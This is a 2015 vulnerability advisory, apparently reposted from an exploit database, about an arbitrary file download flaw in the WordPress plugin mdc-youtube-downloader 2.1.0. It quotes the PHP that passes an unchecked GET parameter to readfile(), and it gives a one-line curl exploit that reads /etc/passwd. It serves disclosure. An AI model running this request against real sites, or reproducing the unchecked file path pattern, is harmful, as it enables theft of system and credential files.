Title: Remote file download in Wordpress Plugin mdc-youtube-downloader v2.1.0 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-01 Download Site: https://wordpress.org/plugins/mdc-youtube-downloader Vendor: https://profiles.wordpress.org/mukto90/ Vendor Notified: 2015-07-01, removed vulnerable code. Vendor Contact: n.mukto@gmail.com Description: MDC YouTube Downloader allows visitors to download YouTube videos directly from your WordPress site. Vulnerability: The code in mdc-youtube-downloader/includes/download.php doesn't restrict access to the local file system allowing sensitive files to be downloaded: $file_name = $_GET['file']; // make sure it's a file before doing anything! if(is_file($file_name)) { . . . switch(strtolower(substr(strrchr($file_name, '.'), 1))) { case 'pdf': $mime = 'application/pdf'; break; case 'zip': $mime = 'application/zip'; break; case 'jpeg': case 'jpg': $mime = 'image/jpg'; break; default: $mime = 'application/force-download'; } header('Pragma: public'); // required header('Expires: 0'); // no cache header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT'); header('Cache-Control: private',false); header('Content-Type: '.$mime); header('Content-Disposition: attachment; filename="'.basename($file_name).'"'); header('Content-Transfer-Encoding: binary'); header('Content-Length: '.filesize($file_name)); // provide file size header('Connection: close'); readfile($file_name); // push it out exit(); CVEID: Requested, TBD. OSVDB: TBD. Exploit Code: • $ curl http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd # Iranian Exploit DataBase = http://IeDb.Ir [2015-07-09]